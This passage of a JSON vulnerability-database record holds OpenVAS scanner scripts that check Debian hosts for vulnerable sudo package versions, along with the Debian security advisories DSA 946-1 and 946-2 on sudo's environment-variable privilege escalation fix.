fixed in\nversion 1.6.8p12-1.\n\nWe recommend that you upgrade your sudo package. For unstable\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20946-1\";\ntag_summary = \"The remote host is missing an update to sudo\nannounced via advisory DSA 946-1.\n\nIt has been discovered that sudo, a privileged program, that provides\nlimited super user privileges to specific users, passes several\nenvironment variables to the program that runs with elevated\nprivileges. In the case of include paths (e.g. 
for Perl, Python, Ruby\nor other scripting languages) this can cause arbitrary code to be\nexecuted as privileged user if the attacker points to a manipulated\nversion of a system library.\n\nThis update alters the former behaviour of sudo and limits the number\nof supported environment variables to LC_*, LANG, LANGUAGE and TERM.\nAdditional variables are only passed through when set as env_check in\n/etc/sudoers, which might be required for some scripts to continue to\nwork.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.5.\";\n\n\nif(description)\n{\n script_id(56192);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:07:13 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 946-1 (sudo)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.6-1.5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.8p7-1.3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "The remote host is missing an update to sudo\nannounced via advisory DSA 946-2.\n\nThe former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this\nupdate.\n\nThe configuration option env_reset is now activated by default. 
It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text:\n\nIt has been discovered that sudo, a privileged program, that\nprovides limited super user privileges to specific users, passes\nseveral environment variables to the program that runs with\nelevated privileges. In the case of include paths (e.g. for Perl,\nPython, Ruby or other scripting languages) this can cause arbitrary\ncode to be executed as privileged user if the attacker points to a\nmanipulated version of a system library.\n\nThis update alters the former behaviour of sudo and limits the\nnumber of supported environment variables to LC_*, LANG, LANGUAGE\nand TERM. Additional variables are only passed through when set as\nenv_check in /etc/sudoers, which might be required for some scripts\nto continue to work.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56531", "href": "http://plugins.openvas.org/nasl.php?oid=56531", "type": "openvas", "title": "Debian Security Advisory DSA 946-2 (sudo)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_946_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 946-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.4.\n\nFor the unstable distribution (sid) the same behaviour will be\nimplemented soon.\n\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20946-2\";\ntag_summary = \"The remote host is missing an update to sudo\nannounced via advisory DSA 946-2.\n\nThe former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this\nupdate.\n\nThe configuration option env_reset is now activated by default. 
It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text:\n\nIt has been discovered that sudo, a privileged program, that\nprovides limited super user privileges to specific users, passes\nseveral environment variables to the program that runs with\nelevated privileges. In the case of include paths (e.g. for Perl,\nPython, Ruby or other scripting languages) this can cause arbitrary\ncode to be executed as privileged user if the attacker points to a\nmanipulated version of a system library.\n\nThis update alters the former behaviour of sudo and limits the\nnumber of supported environment variables to LC_*, LANG, LANGUAGE\nand TERM. Additional variables are only passed through when set as\nenv_check in /etc/sudoers, which might be required for some scripts\nto continue to work.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.\";\n\n\nif(description)\n{\n script_id(56531);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:07:13 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 946-2 (sudo)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.6-1.6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sudo\", ver:\"1.6.8p7-1.4\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 946-2 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 8th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : sudo\nVulnerability : missing input sanitising\nProblem type : local\nDebian-specific: no\nCVE IDs : CVE-2005-4158 CVE-2006-0151\nDebian Bug : 342948\n\nThe former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this\nupdate.\n\nThe configuration option "env_reset" is now activated by default. 
It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text:\n\n It has been discovered that sudo, a privileged program, that\n provides limited super user privileges to specific users, passes\n several environment variables to the program that runs with\n elevated privileges. In the case of include paths (e.g. for Perl,\n Python, Ruby or other scripting languages) this can cause arbitrary\n code to be executed as privileged user if the attacker points to a\n manipulated version of a system library.\n\n This update alters the former behaviour of sudo and limits the\n number of supported environment variables to LC_*, LANG, LANGUAGE\n and TERM. Additional variables are only passed through when set as\n env_check in /etc/sudoers, which might be required for some scripts\n to continue to work.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.4. 
\n\nFor the unstable distribution (sid) the same behaviour will be\nimplemented soon.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and 
http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-04-08T00:00:00", "published": "2006-04-08T00:00:00", "id": "DEBIAN:DSA-946-2:8641C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00115.html", "title": "[SECURITY] [DSA 946-2] New sudo packages fix privilege escalation", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:07", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 946-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJanuary 20th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : sudo\nVulnerability : missing input sanitising\nProblem type : local\nDebian-specific: no\nCVE IDs : CVE-2005-4158 CVE-2006-0151\nDebian Bug : 342948\n\nIt has been discovered that sudo, a privileged program, that provides\nlimited super user privileges to specific users, passes several\nenvironment variables to the program that runs with elevated\nprivileges. In the case of include paths (e.g. 
for Perl, Python, Ruby\nor other scripting languages) this can cause arbitrary code to be\nexecuted as privileged user if the attacker points to a manipulated\nversion of a system library.\n\nThis update alters the former behaviour of sudo and limits the number\nof supported environment variables to LC_*, LANG, LANGUAGE and TERM.\nAdditional variables are only passed through when set as env_check in\n/etc/sudoers, which might be required for some scripts to continue to\nwork.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.5.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.6.8p12-1.\n\nWe recommend that you upgrade your sudo package. For unstable\n"Defaults = env_reset" need to be added to /etc/sudoers manually.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-01-20T00:00:00", "published": "2006-01-20T00:00:00", "id": "DEBIAN:DSA-946-1:530F0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00019.html", "title": "[SECURITY] [DSA 946-1] New sudo packages fix privilege escalation", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}